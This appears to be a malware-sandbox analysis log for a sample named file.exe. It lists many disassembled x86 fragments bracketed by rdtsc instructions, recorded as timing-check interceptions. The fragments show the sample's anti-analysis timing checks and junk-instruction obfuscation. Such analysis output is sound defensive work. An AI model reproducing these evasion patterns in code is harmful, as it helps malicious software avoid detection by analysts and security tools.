                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4396 second address: DC43BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66B1272F65h 0x00000008 jnl 00007F66B1272F56h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC43BB second address: DC43BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC43BF second address: DC43C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC451F second address: DC4527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4527 second address: DC452D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC452D second address: DC4533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5EAD second address: DC5EEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F66B1272F69h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jmp 00007F66B1272F68h 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5EEE second address: DC5F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66B07B4FAEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 ja 00007F66B07B4FA8h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5F12 second address: DC5F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F66B1272F56h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5FFA second address: DC603D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F66B07B4FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 4FBE1602h 0x00000012 jo 00007F66B07B4FACh 0x00000018 xor ecx, dword ptr [ebp+122D29A6h] 0x0000001e lea ebx, dword ptr [ebp+12457D55h] 0x00000024 mov edx, esi 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a jmp 00007F66B07B4FB8h 0x0000002f pop ebx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC603D second address: DC6042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6042 second address: DC6048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6048 second address: DC605A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F66B1272F5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC605A second address: DC605E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC605E second address: DC6063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC614A second address: DC6150 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6150 second address: DC6156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6300 second address: DC6305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6305 second address: DC630B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC630B second address: DC6343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub dword ptr [ebp+122D1814h], eax 0x0000000e push 00000000h 0x00000010 pushad 0x00000011 jnl 00007F66B07B4FBBh 0x00000017 popad 0x00000018 push 44009523h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6343 second address: DC6349 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6349 second address: DC634F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC634F second address: DC63A9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66B1272F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 440095A3h 0x00000013 mov di, 9FD8h 0x00000017 push 00000003h 0x00000019 je 00007F66B1272F6Fh 0x0000001f jmp 00007F66B1272F69h 0x00000024 mov dword ptr [ebp+122D1898h], ecx 0x0000002a push 00000000h 0x0000002c push 00000003h 0x0000002e mov edi, esi 0x00000030 push 801ED96Ah 0x00000035 pushad 0x00000036 jnp 00007F66B1272F58h 0x0000003c push eax 0x0000003d push edx 0x0000003e ja 00007F66B1272F56h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC63A9 second address: DC63AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC63AD second address: DC63D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 401ED96Ah 0x0000000e mov dword ptr [ebp+122D2FA0h], edi 0x00000014 lea ebx, dword ptr [ebp+12457D69h] 0x0000001a add di, 7F09h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC63D2 second address: DC63D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1720 second address: DB1726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE65CE second address: DE65E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F66B07B4FA6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jbe 00007F66B07B4FA6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE688B second address: DE68B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F66B1272F66h 0x0000000b jo 00007F66B1272F56h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F66B1272F56h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68B6 second address: DE68C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68C0 second address: DE68C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68C6 second address: DE68CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68CA second address: DE68E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007F66B1272F5Dh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68E8 second address: DE68F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F66B07B4FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68F2 second address: DE68FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6A84 second address: DE6A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6A8C second address: DE6A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7181 second address: DE7185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7185 second address: DE71B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F64h 0x00000007 jne 00007F66B1272F56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F66B1272F5Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7444 second address: DE7448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7448 second address: DE744C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE744C second address: DE7452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7452 second address: DE7457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE574 second address: DDE5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB6h 0x00000009 popad 0x0000000a jne 00007F66B07B4FAEh 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE5A1 second address: DDE5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE5A7 second address: DDE5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE5AD second address: DDE5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F60h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE5C5 second address: DDE5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F66B07B4FAFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F66B07B4FB5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7755 second address: DE777F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F66B1272F5Ch 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F66B1272F66h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE777F second address: DE7783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7E7E second address: DE7E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7E84 second address: DE7EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7FE0 second address: DE801E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F66B1272F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f js 00007F66B1272F56h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F66B1272F66h 0x00000020 pop edi 0x00000021 push ebx 0x00000022 ja 00007F66B1272F56h 0x00000028 pop ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE801E second address: DE8022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE599 second address: DDE5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE47D second address: DEE490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FAAh 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC4E2 second address: DAC504 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F66B1272F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F66B1272F65h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC504 second address: DAC511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F66B07B4FA6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC511 second address: DAC53C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F66B1272F63h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3211 second address: DF321E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF338C second address: DF339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F5Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF339C second address: DF33BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F66B07B4FB7h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF33BC second address: DF33F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F66B1272F5Fh 0x0000000e pushad 0x0000000f jbe 00007F66B1272F56h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A31 second address: DF3A3F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A3F second address: DF3A44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5B43 second address: DF5BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 75531642h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F66B07B4FA8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a or esi, dword ptr [ebp+122D30E8h] 0x00000030 call 00007F66B07B4FA9h 0x00000035 jng 00007F66B07B4FBDh 0x0000003b push eax 0x0000003c jmp 00007F66B07B4FAEh 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 push eax 0x00000046 pushad 0x00000047 jmp 00007F66B07B4FB6h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5BD6 second address: DF5BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edi 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d pop edi 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F66B1272F58h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5EAE second address: DF5EBA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6039 second address: DF603E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF67FB second address: DF6801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6801 second address: DF6838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F66B1272F64h 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F66B1272F68h 0x00000016 jmp 00007F66B1272F62h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6A13 second address: DF6A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF72E6 second address: DF72EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF72EA second address: DF72F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7D0B second address: DF7D11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7D11 second address: DF7D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F66B07B4FA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7D1B second address: DF7D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7D1F second address: DF7D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F66B07B4FB5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7D3F second address: DF7DCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, dword ptr [ebp+122D2A9Ah] 0x00000010 mov dword ptr [ebp+122D1FB1h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F66B1272F58h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov si, 0C27h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F66B1272F58h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 ja 00007F66B1272F5Ah 0x00000058 xchg eax, ebx 0x00000059 push ebx 0x0000005a jg 00007F66B1272F60h 0x00000060 pop ebx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 pushad 0x00000066 popad 0x00000067 pop eax 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF99F7 second address: DF99FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF97A7 second address: DF97ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F66B1272F64h 0x0000000f je 00007F66B1272F56h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F66B1272F63h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA47C second address: DFA4F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F66B07B4FA8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F66B07B4FB3h 0x00000016 jl 00007F66B07B4FA8h 0x0000001c popad 0x0000001d nop 0x0000001e mov esi, 2F11AC60h 0x00000023 push eax 0x00000024 jmp 00007F66B07B4FB6h 0x00000029 pop esi 0x0000002a push 00000000h 0x0000002c jmp 00007F66B07B4FACh 0x00000031 mov dword ptr [ebp+122D2F09h], ecx 0x00000037 push 00000000h 0x00000039 adc si, 938Eh 0x0000003e mov dword ptr [ebp+1246AE0Bh], ecx 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jnl 00007F66B07B4FA8h 0x0000004d push ebx 0x0000004e pop ebx 0x0000004f rdtsc
